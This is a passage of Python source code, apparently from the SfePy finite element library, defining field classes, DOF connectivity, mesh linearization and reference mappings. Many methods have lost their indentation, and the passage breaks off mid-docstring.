    faces_vals = nm.zeros((n_face, n_qp, dim), nm.float64)
    for ii, face in enumerate(faces):
        faces_vals[ii, :, :] = nm.dot(base, vertex_vals[face, :dim])

    return faces_vals
def get_eval_expression(expression,
                        fields, materials, variables,
                        functions=None, mode='eval', term_mode=None,
                        extra_args=None, verbose=True, kwargs=None):
    """
    Get the function for evaluating an expression given a list of elements,
    and reference element coordinates.
    """
    from sfepy.discrete.evaluate import eval_in_els_and_qp

    def _eval(iels, coors):
        # Evaluate the expression in the given elements/coordinates and
        # strip the trailing component axis.
        result = eval_in_els_and_qp(expression, iels, coors, fields,
                                    materials, variables,
                                    functions=functions, mode=mode,
                                    term_mode=term_mode,
                                    extra_args=extra_args,
                                    verbose=verbose, kwargs=kwargs)
        return result[..., 0]

    return _eval
def create_expression_output(expression, name, primary_field_name,
                             fields, materials, variables,
                             functions=None, mode='eval', term_mode=None,
                             extra_args=None, verbose=True, kwargs=None,
                             min_level=0, max_level=1, eps=1e-4):
    """
    Create output mesh and data for the expression using the adaptive
    linearizer.

    Parameters
    ----------
    expression : str
        The expression to evaluate.
    name : str
        The name of the data.
    primary_field_name : str
        The name of field that defines the element groups and polynomial
        spaces.
    fields : dict
        The dictionary of fields used in `variables`.
    materials : Materials instance
        The materials used in the expression.
    variables : Variables instance
        The variables used in the expression.
    functions : Functions instance, optional
        The user functions for materials etc.
    mode : one of 'eval', 'el_avg', 'qp'
        The evaluation mode - 'qp' requests the values in quadrature points,
        'el_avg' element averages and 'eval' means integration over
        each term region.
    term_mode : str
        The term call mode - some terms support different call modes
        and depending on the call mode different values are
        returned.
    extra_args : dict, optional
        Extra arguments to be passed to terms in the expression.
    verbose : bool
        If False, reduce verbosity.
    kwargs : dict, optional
        The variables (dictionary of (variable name) : (Variable
        instance)) to be used in the expression.
    min_level : int
        The minimum required level of mesh refinement.
    max_level : int
        The maximum level of mesh refinement.
    eps : float
        The relative tolerance parameter of mesh adaptivity.

    Returns
    -------
    out : dict
        The output dictionary.
    """
    # The primary field provides geometry, spaces and vertex connectivity.
    field = fields[primary_field_name]
    vertex_coors = field.coors[:field.n_vertex_dof, :]
    ps = field.poly_space
    gps = field.gel.poly_space
    vertex_conn = field.econn[:, :field.gel.n_vertex]

    # Per-element evaluators consumed by the adaptive linearizer.
    eval_dofs = get_eval_expression(expression,
                                    fields, materials, variables,
                                    functions=functions,
                                    mode=mode, extra_args=extra_args,
                                    verbose=verbose, kwargs=kwargs)
    eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)

    # Refine between min_level and max_level until data change less than eps.
    (level, coors, conn,
     vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
                                     vertex_conn.shape[0], ps,
                                     min_level=min_level,
                                     max_level=max_level, eps=eps)

    mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
                          field.domain.mesh.descs)

    out = {}
    out[name] = Struct(name='output_data', mode='vertex',
                       data=vdofs, var_name=name, dofs=None,
                       mesh=mesh, level=level)

    out = convert_complex_output(out)

    return out
class FEField(Field):
"""
Base class for finite element fields.
Notes
-----
- interps and hence node_descs are per region (must have single
geometry!)
Field shape information:
- ``shape`` - the shape of the base functions in a point
- ``n_components`` - the number of DOFs per FE node
- ``val_shape`` - the shape of field value (the product of DOFs and
base functions) in a point
"""
    def __init__(self, name, dtype, shape, region, approx_order=1):
        """
        Create a finite element field.

        Parameters
        ----------
        name : str
            The field name.
        dtype : numpy.dtype
            The field data type: float64 or complex128.
        shape : int/tuple/str
            The field shape: 1 or (1,) or 'scalar', space dimension (2, or (2,)
            or 3 or (3,)) or 'vector', or a tuple. The field shape determines
            the shape of the FE base functions and is related to the number of
            components of variables and to the DOF per node count, depending
            on the field kind.
        region : Region
            The region where the field is defined.
        approx_order : int or tuple
            The FE approximation order. The tuple form is (order, has_bubble),
            e.g. (1, True) means order 1 with a bubble function.

        Notes
        -----
        Assumes one cell type for the whole region!
        """
        shape = parse_shape(shape, region.domain.shape.dim)
        if not self._check_region(region):
            raise ValueError('unsuitable region for field %s! (%s)' %
                             (name, region.name))

        Struct.__init__(self, name=name, dtype=dtype, shape=shape,
                        region=region)
        self.domain = self.region.domain

        # Order matters: geometry must be known before shape/interpolant.
        self._set_approx_order(approx_order)
        self._setup_geometry()
        self._setup_kind()
        self._setup_shape()

        # Per-region caches of surface/point connectivity data.
        self.surface_data = {}
        self.point_data = {}
        # Cell orientation data passed to base evaluation; None by default.
        self.ori = None
        self._create_interpolant()
        self._setup_global_base()
        self.setup_coors()
        self.clear_mappings(clear_all=True)
        self.clear_qp_base()
        # DOF substitution state, see substitute_dofs()/restore_dofs().
        self.basis_transform = None
        self.econn0 = None
        self.unused_dofs = None
        self.stored_subs = None
def _set_approx_order(self, approx_order):
"""
Set a uniform approximation order.
"""
if isinstance(approx_order, tuple):
self.approx_order = approx_order[0]
self.force_bubble = approx_order[1]
else:
self.approx_order = approx_order
self.force_bubble = False
def get_true_order(self):
"""
Get the true approximation order depending on the reference
element geometry.
For example, for P1 (linear) approximation the true order is 1,
while for Q1 (bilinear) approximation in 2D the true order is 2.
"""
gel = self.gel
if (gel.dim + 1) == gel.n_vertex:
order = self.approx_order
else:
order = gel.dim * self.approx_order
if self.force_bubble:
bubble_order = gel.dim + 1
order = max(order, bubble_order)
return order
def is_higher_order(self):
"""
Return True, if the field's approximation order is greater than one.
"""
return self.force_bubble or (self.approx_order > 1)
def _setup_global_base(self):
"""
Setup global DOF/base functions, their indices and connectivity of the
field. Called methods implemented in subclasses.
"""
self._setup_facet_orientations()
self._init_econn()
self.n_vertex_dof, self.vertex_remap = self._setup_vertex_dofs()
self.vertex_remap_i = invert_remap(self.vertex_remap)
aux = self._setup_edge_dofs()
self.n_edge_dof, self.edge_dofs, self.edge_remap = aux
aux = self._setup_face_dofs()
self.n_face_dof, self.face_dofs, self.face_remap = aux
aux = self._setup_bubble_dofs()
self.n_bubble_dof, self.bubble_dofs, self.bubble_remap = aux
self.n_nod = self.n_vertex_dof + self.n_edge_dof \
+ self.n_face_dof + self.n_bubble_dof
self._setup_esurface()
def _setup_esurface(self):
"""
Setup extended surface entities (edges in 2D, faces in 3D),
i.e. indices of surface entities into the extended connectivity.
"""
node_desc = self.node_desc
gel = self.gel
self.efaces = gel.get_surface_entities().copy()
nd = node_desc.edge
if nd is not None:
efs = []
for eof in gel.get_edges_per_face():
efs.append(nm.concatenate([nd[ie] for ie in eof]))
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.efaces = nm.hstack((self.efaces, efs))
efs = node_desc.face
if efs is not None:
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.efaces = nm.hstack((self.efaces, efs))
if gel.dim == 3:
self.eedges = gel.edges.copy()
efs = node_desc.edge
if efs is not None:
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.eedges = nm.hstack((self.eedges, efs))
    def set_coors(self, coors, extra_dofs=False):
        """
        Set coordinates of field nodes.

        Parameters
        ----------
        coors : array
            The mesh (vertex) coordinates; with `extra_dofs` set, the
            coordinates of all the field nodes.
        extra_dofs : bool
            If True, `coors` already contains the extra node coordinates,
            so no interpolation is performed.
        """
        # Mesh vertex nodes.
        if self.n_vertex_dof:
            indx = self.vertex_remap_i
            self.coors[:self.n_vertex_dof] = nm.take(coors,
                                                     indx.astype(nm.int32),
                                                     axis=0)

        n_ex_dof = self.n_bubble_dof + self.n_edge_dof + self.n_face_dof

        # extra nodes
        if n_ex_dof:
            if extra_dofs:
                # All node coordinates must be provided in this case.
                if self.n_nod != coors.shape[0]:
                    raise NotImplementedError
                self.coors[:] = coors
            else:
                # Interpolate extra node coordinates from the vertices.
                gps = self.gel.poly_space
                ps = self.poly_space
                eval_nodal_coors(self.coors, coors, self.region,
                                 ps, gps, self.econn)
def setup_coors(self):
"""
Setup coordinates of field nodes.
"""
mesh = self.domain.mesh
self.coors = nm.empty((self.n_nod, mesh.dim), nm.float64)
self.set_coors(mesh.coors)
def get_vertices(self):
"""
Return indices of vertices belonging to the field region.
"""
return self.vertex_remap_i
def _get_facet_dofs(self, rfacets, remap, dofs):
facets = remap[rfacets]
return dofs[facets[facets >= 0]].ravel()
    def get_data_shape(self, integral, integration='volume', region_name=None):
        """
        Get element data dimensions.

        Parameters
        ----------
        integral : Integral instance
            The integral describing used numerical quadrature.
        integration : 'volume', 'surface', 'surface_extra', 'point' or 'custom'
            The term integration type.
        region_name : str
            The name of the region of the integral.

        Returns
        -------
        data_shape : 4 ints
            The `(n_el, n_qp, dim, n_en)` for volume shape kind,
            `(n_fa, n_qp, dim, n_fn)` for surface shape kind and
            `(n_nod, 0, 0, 1)` for point shape kind.

        Notes
        -----
        - `n_el`, `n_fa` = number of elements/facets
        - `n_qp` = number of quadrature points per element/facet
        - `dim` = spatial dimension
        - `n_en`, `n_fn` = number of element/facet nodes
        - `n_nod` = number of element nodes
        """
        region = self.domain.regions[region_name]
        shape = region.shape
        dim = region.dim

        if integration in ('surface', 'surface_extra'):
            sd = self.surface_data[region_name]

            # This works also for surface fields.
            key = sd.face_type
            weights = self.get_qp(key, integral).weights
            n_qp = weights.shape[0]

            if integration == 'surface':
                # Facet nodes only.
                data_shape = (sd.n_fa, n_qp, dim, sd.n_fp)
            else:
                # 'surface_extra' uses the whole element connectivity.
                data_shape = (sd.n_fa, n_qp, dim, self.econn.shape[1])

        elif integration in ('volume', 'custom'):
            _, weights = integral.get_qp(self.gel.name)
            n_qp = weights.shape[0]

            data_shape = (shape.n_cell, n_qp, dim, self.econn.shape[1])

        elif integration == 'point':
            # One "node" per DOF in the region, no quadrature.
            dofs = self.get_dofs_in_region(region, merge=True)
            data_shape = (dofs.shape[0], 0, 0, 1)

        else:
            raise NotImplementedError('unsupported integration! (%s)'
                                      % integration)

        return data_shape
def get_dofs_in_region(self, region, merge=True):
"""
Return indices of DOFs that belong to the given region and group.
"""
node_desc = self.node_desc
dofs = []
vdofs = nm.empty((0,), dtype=nm.int32)
if node_desc.vertex is not None:
vdofs = self.vertex_remap[region.vertices]
vdofs = vdofs[vdofs >= 0]
dofs.append(vdofs)
edofs = nm.empty((0,), dtype=nm.int32)
if node_desc.edge is not None:
edofs = self._get_facet_dofs(region.edges,
self.edge_remap,
self.edge_dofs)
dofs.append(edofs)
fdofs = nm.empty((0,), dtype=nm.int32)
if node_desc.face is not None:
fdofs = self._get_facet_dofs(region.faces,
self.face_remap,
self.face_dofs)
dofs.append(fdofs)
bdofs = nm.empty((0,), dtype=nm.int32)
if (node_desc.bubble is not None) and region.has_cells():
els = self.bubble_remap[region.cells]
bdofs = self.bubble_dofs[els[els >= 0]].ravel()
dofs.append(bdofs)
if merge:
dofs = nm.concatenate(dofs)
return dofs
def clear_qp_base(self):
"""
Remove cached quadrature points and base functions.
"""
self.qp_coors = {}
self.bf = {}
def get_qp(self, key, integral):
"""
Get quadrature points and weights corresponding to the given key
and integral. The key is 'v' or 's#', where # is the number of
face vertices.
"""
qpkey = (integral.order, key)
if qpkey not in self.qp_coors:
if (key[0] == 's') and not self.is_surface:
dim = self.gel.dim - 1
n_fp = self.gel.surface_facet.n_vertex
geometry = '%d_%d' % (dim, n_fp)
else:
geometry = self.gel.name
vals, weights = integral.get_qp(geometry)
self.qp_coors[qpkey] = Struct(vals=vals, weights=weights)
return self.qp_coors[qpkey]
    def substitute_dofs(self, subs, restore=False):
        """
        Perform facet DOF substitutions according to `subs`.

        Modifies `self.econn` in-place and sets `self.econn0`,
        `self.unused_dofs` and `self.basis_transform`.

        With `restore` set and previously stored substitutions available
        (see :func:`FEField.restore_dofs()`), those are re-applied instead
        of computing new ones.
        """
        if restore and (self.stored_subs is not None):
            # Re-apply the stored substitution state.
            self.econn0 = self.econn
            self.econn, self.unused_dofs, basis_transform = self.stored_subs

        else:
            if subs is None:
                # Nothing to substitute - keep the transform unset.
                self.econn0 = self.econn
                return

            else:
                self.econn0 = self.econn.copy()
                self._substitute_dofs(subs)

                # DOFs present in the original connectivity only.
                self.unused_dofs = nm.setdiff1d(self.econn0, self.econn)

                basis_transform = self._eval_basis_transform(subs)

        self.set_basis_transform(basis_transform)
def restore_dofs(self, store=False):
"""
Undoes the effect of :func:`FEField.substitute_dofs()`.
"""
if self.econn0 is None:
raise ValueError('no original DOFs to restore!')
if store:
self.stored_subs = (self.econn,
self.unused_dofs,
self.basis_transform)
else:
self.stored_subs = None
self.econn = self.econn0
self.econn0 = None
self.unused_dofs = None
self.basis_transform = None
def set_basis_transform(self, transform):
"""
Set local element basis transformation.
The basis transformation is applied in :func:`FEField.get_base()` and
:func:`FEField.create_mapping()`.
Parameters
----------
transform : array, shape `(n_cell, n_ep, n_ep)`
The array with `(n_ep, n_ep)` transformation matrices for each cell
in the field's region, where `n_ep` is the number of element DOFs.
"""
self.basis_transform = transform
    def restore_substituted(self, vec):
        """
        Restore values of the unused DOFs using the transpose of the applied
        basis transformation.
        """
        if (self.econn0 is None) or (self.basis_transform is None):
            raise ValueError('no original DOF values to restore!!')

        vec = vec.reshape((self.n_nod, self.n_components)).copy()
        evec = vec[self.econn]

        # Apply the transposed per-cell transform:
        # out[c, i, k] = sum_j T[c, j, i] * evec[c, j, k].
        vec[self.econn0] = nm.einsum('cji,cjk->cik', self.basis_transform, evec)

        return vec.ravel()
def get_base(self, key, derivative, integral, iels=None,
from_geometry=False, base_only=True):
qp = self.get_qp(key, integral)
if from_geometry:
ps = self.gel.poly_space
else:
ps = self.poly_space
_key = key if not from_geometry else 'g' + key
bf_key = (integral.order, _key, derivative)
if bf_key not in self.bf:
ori = self.ori
self.bf[bf_key] = ps.eval_base(qp.vals, diff=derivative, ori=ori,
transform=self.basis_transform)
bf = self.bf[bf_key]
if iels is not None and bf.ndim == 4:
bf = bf[iels]
if base_only:
return bf
else:
return bf, qp.weights
def create_bqp(self, region_name, integral):
gel = self.gel
sd = self.surface_data[region_name]
bqpkey = (integral.order, sd.bkey)
if not bqpkey in self.qp_coors:
qp = self.get_qp(sd.face_type, integral)
ps_s = self.gel.surface_facet.poly_space
bf_s = ps_s.eval_base(qp.vals)
coors, faces = gel.coors, gel.get_surface_entities()
vals = _interp_to_faces(coors, bf_s, faces)
self.qp_coors[bqpkey] = Struct(name='BQP_%s' % sd.bkey,
vals=vals, weights=qp.weights)
def extend_dofs(self, dofs, fill_value=None):
"""
Extend DOFs to the whole domain using the `fill_value`, or the
smallest value in `dofs` if `fill_value` is None.
"""
if fill_value is None:
if nm.isrealobj(dofs):
fill_value = get_min_value(dofs)
else:
# Complex values - treat real and imaginary parts separately.
fill_value = get_min_value(dofs.real)
fill_value += 1j * get_min_value(dofs.imag)
if self.approx_order != 0:
indx = self.get_vertices()
n_nod = self.domain.shape.n_nod
new_dofs = nm.empty((n_nod, dofs.shape[1]), dtype=self.dtype)
new_dofs.fill(fill_value)
new_dofs[indx] = dofs[:indx.size]
else:
new_dofs = extend_cell_data(dofs, self.domain, self.region,
val=fill_value)
return new_dofs
def remove_extra_dofs(self, dofs):
"""
Remove DOFs defined in higher order nodes (order > 1).
"""
if self.approx_order != 0:
new_dofs = dofs[:self.n_vertex_dof]
else:
new_dofs = dofs
return new_dofs
    def linearize(self, dofs, min_level=0, max_level=1, eps=1e-4):
        """
        Linearize the solution for post-processing.

        Parameters
        ----------
        dofs : array, shape (n_nod, n_component)
            The array of DOFs reshaped so that each column corresponds
            to one component.
        min_level : int
            The minimum required level of mesh refinement.
        max_level : int
            The maximum level of mesh refinement.
        eps : float
            The relative tolerance parameter of mesh adaptivity.

        Returns
        -------
        mesh : Mesh instance
            The adapted, nonconforming, mesh.
        vdofs : array
            The DOFs defined in vertices of `mesh`.
        levels : array of ints
            The refinement level used for each element group.
        """
        assert_(dofs.ndim == 2)

        n_nod, dpn = dofs.shape

        assert_(n_nod == self.n_nod)
        assert_(dpn == self.shape[0])

        vertex_coors = self.coors[:self.n_vertex_dof, :]

        ps = self.poly_space
        gps = self.gel.poly_space

        vertex_conn = self.econn[:, :self.gel.n_vertex]

        # Per-element evaluators consumed by the adaptive linearizer.
        eval_dofs = get_eval_dofs(dofs, self.econn, ps, ori=self.ori)
        eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)

        (level, coors, conn,
         vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
                                         vertex_conn.shape[0], ps,
                                         min_level=min_level,
                                         max_level=max_level, eps=eps)

        mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
                              self.domain.mesh.descs)

        return mesh, vdofs, level
def get_output_approx_order(self):
"""
Get the approximation order used in the output file.
"""
return min(self.approx_order, 1)
    def create_output(self, dofs, var_name, dof_names=None,
                      key=None, extend=True, fill_value=None,
                      linearization=None):
        """
        Convert the DOFs corresponding to the field to a dictionary of
        output data usable by Mesh.write().

        Parameters
        ----------
        dofs : array, shape (n_nod, n_component)
            The array of DOFs reshaped so that each column corresponds
            to one component.
        var_name : str
            The variable name corresponding to `dofs`.
        dof_names : tuple of str
            The names of DOF components.
        key : str, optional
            The key to be used in the output dictionary instead of the
            variable name.
        extend : bool
            Extend the DOF values to cover the whole domain.
        fill_value : float or complex
            The value used to fill the missing DOF values if `extend` is True.
        linearization : Struct or None
            The linearization configuration for higher order approximations.

        Returns
        -------
        out : dict
            The output dictionary.
        """
        linearization = get_default(linearization, Struct(kind='strip'))

        out = {}
        if linearization.kind is None:
            # Raw output: all DOFs as they are.
            out[key] = Struct(name='output_data', mode='full',
                              data=dofs, var_name=var_name,
                              dofs=dof_names, field_name=self.name)

        elif linearization.kind == 'strip':
            # Vertex-only output: either extend to the whole domain or
            # drop the extra (higher order) DOFs.
            if extend:
                ext = self.extend_dofs(dofs, fill_value)
            else:
                ext = self.remove_extra_dofs(dofs)

            if ext is not None:
                approx_order = self.get_output_approx_order()

                if approx_order != 0:
                    # Has vertex data.
                    out[key] = Struct(name='output_data', mode='vertex',
                                      data=ext, var_name=var_name,
                                      dofs=dof_names)
                else:
                    # Cell data needs the (n_cell, 1, nc, 1) shape.
                    ext.shape = (ext.shape[0], 1, ext.shape[1], 1)
                    out[key] = Struct(name='output_data', mode='cell',
                                      data=ext, var_name=var_name,
                                      dofs=dof_names)

        else:
            # Adaptive linearization for higher order approximations.
            mesh, vdofs, levels = self.linearize(dofs,
                                                 linearization.min_level,
                                                 linearization.max_level,
                                                 linearization.eps)
            out[key] = Struct(name='output_data', mode='vertex',
                              data=vdofs, var_name=var_name, dofs=dof_names,
                              mesh=mesh, levels=levels)

        out = convert_complex_output(out)

        return out
def create_mesh(self, extra_nodes=True):
"""
Create a mesh from the field region, optionally including the field
extra nodes.
"""
mesh = self.domain.mesh
if self.approx_order != 0:
if extra_nodes:
conn = self.econn
else:
conn = self.econn[:, :self.gel.n_vertex]
conns = [conn]
mat_ids = [mesh.cmesh.cell_groups]
descs = mesh.descs[:1]
if extra_nodes:
coors = self.coors
else:
coors = self.coors[:self.n_vertex_dof]
mesh = Mesh.from_data(self.name, coors, None, conns,
mat_ids, descs)
return mesh
def get_evaluate_cache(self, cache=None, share_geometry=False,
verbose=False):
"""
Get the evaluate cache for :func:`Variable.evaluate_at()
<sfepy.discrete.variables.Variable.evaluate_at()>`.
Parameters
----------
cache : Struct instance, optional
Optionally, use the provided instance to store the cache data.
share_geometry : bool
Set to True to indicate that all the evaluations will work on the
same region. Certain data are then computed only for the first
probe and cached.
verbose : bool
If False, reduce verbosity.
Returns
-------
cache : Struct instance
The evaluate cache.
"""
try:
from scipy.spatial import cKDTree as KDTree
except ImportError:
from scipy.spatial import KDTree
from sfepy.discrete.fem.geometry_element import create_geometry_elements
if cache is None:
cache = Struct(name='evaluate_cache')
timer = Timer(start=True)
if (cache.get('cmesh', None) is None) or not share_geometry:
mesh = self.create_mesh(extra_nodes=False)
cache.cmesh = cmesh = mesh.cmesh
gels = create_geometry_elements()
cmesh.set_local_entities(gels)
cmesh.setup_entities()
cache.centroids = cmesh.get_centroids(cmesh.tdim)
if self.gel.name != '3_8':
cache.normals0 = cmesh.get_facet_normals()
cache.normals1 = None
else:
cache.normals0 = cmesh.get_facet_normals(0)
cache.normals1 = cmesh.get_facet_normals(1)
output('cmesh setup: %f s' % timer.stop(), verbose=verbose)
timer.start()
if (cache.get('kdtree', None) is None) or not share_geometry:
cache.kdtree = KDTree(cmesh.coors)
output('kdtree: %f s' % timer.stop(), verbose=verbose)
return cache
def interp_to_qp(self, dofs):
"""
Interpolate DOFs into quadrature points.
The quadrature order is given by the field approximation order.
Parameters
----------
dofs : array
The array of DOF values of shape `(n_nod, n_component)`.
Returns
-------
data_qp : array
The values interpolated into the quadrature points.
integral : Integral
The corresponding integral defining the quadrature points.
"""
integral = Integral('i', order=self.approx_order)
bf = self.get_base('v', False, integral)
bf = bf[:,0,:].copy()
data_qp = nm.dot(bf, dofs[self.econn])
data_qp = nm.swapaxes(data_qp, 0, 1)
data_qp.shape = data_qp.shape + (1,)
return data_qp, integral
def get_coor(self, nods=None):
"""
Get coordinates of the field nodes.
Parameters
----------
nods : array, optional
The indices of the required nodes. If not given, the
coordinates of all the nodes are returned.
"""
if nods is None:
return self.coors
else:
return self.coors[nods]
def get_connectivity(self, region, integration, is_trace=False):
"""
Convenience alias to `Field.get_econn()`, that is used in some terms.
"""
return self.get_econn(integration, region, is_trace=is_trace)
    def create_mapping(self, region, integral, integration,
                       return_mapping=True):
        """
        Create a new reference mapping.

        Compute jacobians, element volumes and base function derivatives
        for Volume-type geometries (volume mappings), and jacobians,
        normals and base function derivatives for Surface-type
        geometries (surface mappings).

        Parameters
        ----------
        region : Region
            The region the mapping is created for.
        integral : Integral
            The integral defining the quadrature points.
        integration : str
            One of 'volume', 'custom', 'surface', 'surface_extra', 'point'.
        return_mapping : bool
            If True, return a ``(geometry, mapping)`` tuple instead of the
            geometry object alone.

        Notes
        -----
        - surface mappings are defined on the surface region
        - surface mappings require field order to be > 0
        """
        domain = self.domain
        coors = domain.get_mesh_coors(actual=True)
        dconn = domain.get_conn()

        # Cell-based integrations restrict the region to true cells only.
        tco = integration in ('volume', 'custom')
        iels = region.get_cells(true_cells_only=tco)

        transform = (self.basis_transform[iels] if self.basis_transform
                     is not None else None)

        if integration == 'volume':
            qp = self.get_qp('v', integral)

            geo_ps = self.gel.poly_space
            ps = self.poly_space
            bf = self.get_base('v', 0, integral, iels=iels)

            # Geometry connectivity restricted to the region cells.
            conn = nm.take(dconn, iels.astype(nm.int32), axis=0)
            mapping = VolumeMapping(coors, conn, poly_space=geo_ps)
            vg = mapping.get_mapping(qp.vals, qp.weights, poly_space=ps,
                                     ori=self.ori, transform=transform)

            out = vg

        elif (integration == 'surface') or (integration == 'surface_extra'):
            # Surface mappings require a nonzero approximation order.
            assert_(self.approx_order > 0)

            if self.ori is not None:
                msg = 'surface integrals do not work yet with the' \
                      ' hierarchical basis!'
                raise ValueError(msg)

            if self.basis_transform is not None:
                msg = 'surface integrals do not work with the' \
                      ' basis transform!'
                raise ValueError(msg)

            sd = domain.surface_groups[region.name]
            esd = self.surface_data[region.name]

            geo_ps = self.gel.poly_space
            ps = self.poly_space

            conn = sd.get_connectivity()

            mapping = SurfaceMapping(coors, conn, poly_space=geo_ps)

            if not self.is_surface:
                # Volume field on a surface region: use boundary quadrature
                # points; evaluate the basis on the first reference facet.
                self.create_bqp(region.name, integral)
                qp = self.qp_coors[(integral.order, esd.bkey)]

                abf = ps.eval_base(qp.vals[0], transform=transform)
                bf = abf[..., self.efaces[0]]

                indx = self.gel.get_surface_entities()[0]
                # Fix geometry element's 1st facet orientation for gradients.
                indx = nm.roll(indx, -1)[::-1]
                mapping.set_basis_indices(indx)

                sg = mapping.get_mapping(qp.vals[0], qp.weights,
                                         poly_space=Struct(n_nod=bf.shape[-1]),
                                         mode=integration)

                if integration == 'surface_extra':
                    # Extra data needed for gradients on the surface:
                    # base function gradients w.r.t. the volume element.
                    sg.alloc_extra_data(self.econn.shape[1])

                    bf_bg = geo_ps.eval_base(qp.vals, diff=True)
                    ebf_bg = self.get_base(esd.bkey, 1, integral)
                    sg.evaluate_bfbgm(bf_bg, ebf_bg, coors, sd.fis, dconn)

            else:
                # NOTE(review): this check looks unreachable — any non-None
                # basis_transform already raised above; kept as-is.
                if self.basis_transform is not None:
                    msg = 'surface fields do not work with the' \
                          ' basis transform!'
                    raise ValueError(msg)

                # Do not use BQP for surface fields.
                qp = self.get_qp(sd.face_type, integral)
                bf = ps.eval_base(qp.vals, transform=transform)

                sg = mapping.get_mapping(qp.vals, qp.weights,
                                         poly_space=Struct(n_nod=bf.shape[-1]),
                                         mode=integration)

            out = sg

        elif integration == 'point':
            out = mapping = None

        elif integration == 'custom':
            raise ValueError('cannot create custom mapping!')

        else:
            raise ValueError('unknown integration geometry type: %s'
                             % integration)

        if out is not None:
            # Store the integral used.
            out.integral = integral
            out.qp = qp
            out.ps = ps

            # Update base.
            out.bf[:] = bf

        if return_mapping:
            out = (out, mapping)

        return out
class VolumeField(FEField):
    """
    Finite element field base class over volume elements (element dimension
    equals space dimension).
    """

    def _check_region(self, region):
        """
        Check whether the `region` can be used for the
        field.

        Returns
        -------
        ok : bool
            True if the region is usable for the field.
        """
        ok = True
        domain = region.domain
        if region.kind != 'cell':
            output("bad region kind! (is: %r, should be: 'cell')"
                   % region.kind)
            ok = False

        elif (region.kind_tdim != domain.shape.tdim):
            output('cells with a bad topological dimension! (%d == %d)'
                   % (region.kind_tdim, domain.shape.tdim))
            ok = False

        return ok

    def _setup_geometry(self):
        """
        Setup the field region geometry.

        Raises
        ------
        ValueError
            If no single reference geometry matches all region cells.
        """
        cmesh = self.domain.cmesh
        for key, gel in six.iteritems(self.domain.geom_els):
            ct = cmesh.cell_types
            if (ct[self.region.cells] == cmesh.key_to_index[gel.name]).all():
                self.gel = gel
                break

        else:
            # for-else: the loop found no geometry covering all cells.
            raise ValueError('region %s of field %s contains multiple'
                             ' reference geometries!'
                             % (self.region.name, self.name))

        self.is_surface = False

    def _create_interpolant(self):
        # Unique name encoding geometry, space, basis, order and the
        # optional bubble function flag.
        name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
                                  self.poly_space_base, self.approx_order,
                                  'B' * self.force_bubble)
        ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
                                     base=self.poly_space_base,
                                     force_bubble=self.force_bubble)
        self.poly_space = ps

    def _init_econn(self):
        """
        Initialize the extended DOF connectivity.
        """
        n_ep = self.poly_space.n_nod
        n_cell = self.region.get_n_cells()
        self.econn = nm.zeros((n_cell, n_ep), nm.int32)

    def _setup_vertex_dofs(self):
        """
        Setup vertex DOF connectivity.

        Returns
        -------
        n_dof : int
            The number of vertex DOFs.
        remap : array or None
            Mapping of mesh vertices to field-local DOF numbers, or None
            if the field has no vertex DOFs.
        """
        if self.node_desc.vertex is None:
            return 0, None

        region = self.region

        cmesh = self.domain.cmesh
        conn, offsets = cmesh.get_incident(0, region.cells, region.tdim,
                                           ret_offsets=True)

        vertices = nm.unique(conn)
        remap = prepare_remap(vertices, region.n_v_max)
        n_dof = vertices.shape[0]

        # All cells must have the same number of vertices.
        aux = nm.unique(nm.diff(offsets))
        assert_(len(aux) == 1, 'region with multiple reference geometries!')
        offset = aux[0]

        # Remap vertex node connectivity to field-local numbering.
        aux = conn.reshape((-1, offset)).astype(nm.int32)
        self.econn[:, :offset] = nm.take(remap, aux)

        return n_dof, remap

    def setup_extra_data(self, geometry, info, is_trace):
        """
        Setup surface or point data required by the term described by `info`.
        """
        dct = info.dc_type.type

        # PEP 8: compare with None using identity.
        if geometry is not None:
            geometry_flag = 'surface' in geometry

        else:
            geometry_flag = False

        if (dct == 'surface') or (geometry_flag):
            reg = info.get_region()
            mreg_name = info.get_region_name(can_trace=False)

            self.domain.create_surface_group(reg)
            self.setup_surface_data(reg, is_trace, mreg_name)

        elif dct == 'edge':
            raise NotImplementedError('dof connectivity type %s' % dct)

        elif dct == 'point':
            self.setup_point_data(self, info.region)

        elif dct not in ('volume', 'scalar', 'custom'):
            raise ValueError('unknown dof connectivity type! (%s)' % dct)

    def setup_point_data(self, field, region):
        # Point data are created lazily and cached per region name.
        if region.name not in self.point_data:
            conn = field.get_dofs_in_region(region, merge=True)
            conn.shape += (1,)

            self.point_data[region.name] = conn

    def setup_surface_data(self, region, is_trace=False, trace_region=None):
        """
        Setup the surface data needed by surface integrals on `region`.

        Notes
        -----
        ``nodes[leconn] == econn``; nodes are sorted by node number, i.e.
        they are in the same order as `region.vertices`.
        """
        if region.name not in self.surface_data:
            sd = FESurface('surface_data_%s' % region.name, region,
                           self.efaces, self.econn, self.region)
            self.surface_data[region.name] = sd

        if region.name in self.surface_data and is_trace:
            sd = self.surface_data[region.name]
            sd.setup_mirror_connectivity(region, trace_region)

        return self.surface_data[region.name]

    def get_econn(self, conn_type, region, is_trace=False, integration=None):
        """
        Get extended connectivity of the given type in the given region.
        """
        ct = conn_type.type if isinstance(conn_type, Struct) else conn_type

        if ct in ('volume', 'custom'):
            if region.name == self.region.name:
                conn = self.econn

            else:
                # Restrict the connectivity to the cells of `region`.
                tco = integration in ('volume', 'custom')
                cells = region.get_cells(true_cells_only=tco)
                ii = self.region.get_cell_indices(cells, true_cells_only=tco)
                conn = nm.take(self.econn, ii, axis=0)

        elif ct == 'surface':
            sd = self.surface_data[region.name]
            conn = sd.get_connectivity(is_trace=is_trace)

        elif ct == 'edge':
            raise NotImplementedError('connectivity type %s' % ct)

        elif ct == 'point':
            conn = self.point_data[region.name]

        else:
            raise ValueError('unknown connectivity type! (%s)' % ct)

        return conn

    def average_qp_to_vertices(self, data_qp, integral):
        r"""
        Average data given in quadrature points in region elements into
        region vertices.

        .. math::
